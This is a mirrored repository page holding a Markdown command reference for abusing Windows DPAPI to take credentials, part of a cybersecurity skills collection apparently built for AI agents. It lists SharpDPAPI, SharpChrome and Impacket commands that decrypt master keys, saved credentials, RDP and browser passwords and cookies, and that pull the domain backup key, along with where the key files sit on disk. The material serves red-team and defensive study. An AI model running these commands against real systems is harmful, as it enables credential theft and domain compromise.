creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-26 11:44:37 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
768ca51c8d331ab0bdcea8ffb31c9b99bb2c1839
Anthropic-Cybersecurity-Skills/skills/abusing-dpapi-for-credential-access/references/api-reference.md
T
mukul975 8cae0648ec Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817) 
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):

- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
  prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
  invocation, guardrails, model/data poisoning, system-prompt leakage,
  embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
  malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
  Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
  shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
  Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration

Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
2026-06-22 19:08:16 +02:00

74 lines
3.3 KiB
Markdown
Raw Blame History

# SharpDPAPI / DPAPI — Command Reference
## SharpDPAPI User Commands
| Command | Purpose | Example |
|---------|---------|---------|
| `triage` | Auto-run credentials, vaults, rdg, certificates | `SharpDPAPI.exe triage /unprotect` |
| `masterkeys` | Decrypt user master keys (GUID:SHA1 output) | `SharpDPAPI.exe masterkeys /password:Pass` |
| `credentials` | Decrypt Credential Manager blobs | `SharpDPAPI.exe credentials /pvk:key.pvk` |
| `vaults` | Decrypt Credential Vault entries | `SharpDPAPI.exe vaults /pvk:key.pvk` |
| `rdg` | Decrypt RDCMan.settings RDP passwords | `SharpDPAPI.exe rdg /unprotect` |
| `keepass` | Decrypt KeePass DPAPI keys | `SharpDPAPI.exe keepass /unprotect` |
| `certificates` | Decrypt certificate private keys | `SharpDPAPI.exe certificates /unprotect /showall` |
## SharpDPAPI Machine Commands (require admin/SYSTEM)
| Command | Purpose |
|---------|---------|
| `machinemasterkeys` | Decrypt machine master keys (uses DPAPI_SYSTEM LSA secret) |
| `machinecredentials` | Decrypt machine credential blobs |
| `machinevaults` | Decrypt machine vault entries |
| `machinetriage` | Run all machine-scoped triage commands |
## SharpDPAPI Supporting Commands
| Command | Purpose | Example |
|---------|---------|---------|
| `backupkey` | Retrieve domain DPAPI backup key (.pvk) via MS-BKRP | `SharpDPAPI.exe backupkey /server:dc01 /file:key.pvk` |
## Common Flags
| Flag | Meaning |
|------|---------|
| `/unprotect` | Use live `CryptUnprotectData` in current user context (online) |
| `/password:<pw>` | Decrypt master keys with the user's plaintext password |
| `/ntlm:<hash>` | Decrypt master keys with the user's NTLM hash |
| `/pvk:<file>` | Use domain backup private key for decryption |
| `/mkfile:<file>` | Provide a specific master key file |
| `/server:<dc>` | Target DC for backupkey retrieval |
| `/target:<path>` | Target file/folder to decrypt |
| `/rpc` | Use RPC to request master key decryption from a DC |
| `/showall` | Show all certificate stores / verbose output |
## SharpChrome Commands
| Command | Purpose | Example |
|---------|---------|---------|
| `logins` | Decrypt saved browser logins | `SharpChrome.exe logins /unprotect` |
| `cookies` | Decrypt browser cookies | `SharpChrome.exe cookies /pvk:key.pvk` |
| `statekeys` | Decrypt the AES app-bound state key | `SharpChrome.exe statekeys /unprotect` |
## Impacket dpapi.py (Linux)
| Subcommand | Purpose | Example |
|------------|---------|---------|
| `masterkey` | Decrypt a master key file | `impacket-dpapi masterkey -file MK -pvk key.pvk` |
| `credential` | Decrypt a credential blob | `impacket-dpapi credential -file CRED -key 0x<mk>` |
| `vault` | Decrypt vault policy/creds | `impacket-dpapi vault -vpol VPOL -vcrd VCRD -key 0x<mk>` |
| `backupkeys` | Retrieve domain backup keys | `impacket-dpapi backupkeys -t corp.local/admin@dc -pvk out.pvk` |
## Key File Locations
| Path | Contents |
|------|----------|
| `%APPDATA%\Microsoft\Protect\<SID>\` | User master keys |
| `%WINDIR%\System32\Microsoft\Protect\` | Machine master keys |
| `%LOCALAPPDATA%\Microsoft\Credentials\` | Credential Manager blobs |
| `%APPDATA%\Microsoft\Vault\` / `%LOCALAPPDATA%\Microsoft\Vault\` | Credential Vault |
## External References
- SharpDPAPI README: https://github.com/GhostPack/SharpDPAPI
- Impacket: https://github.com/fortra/impacket
Reference in New Issue View Git Blame Copy Permalink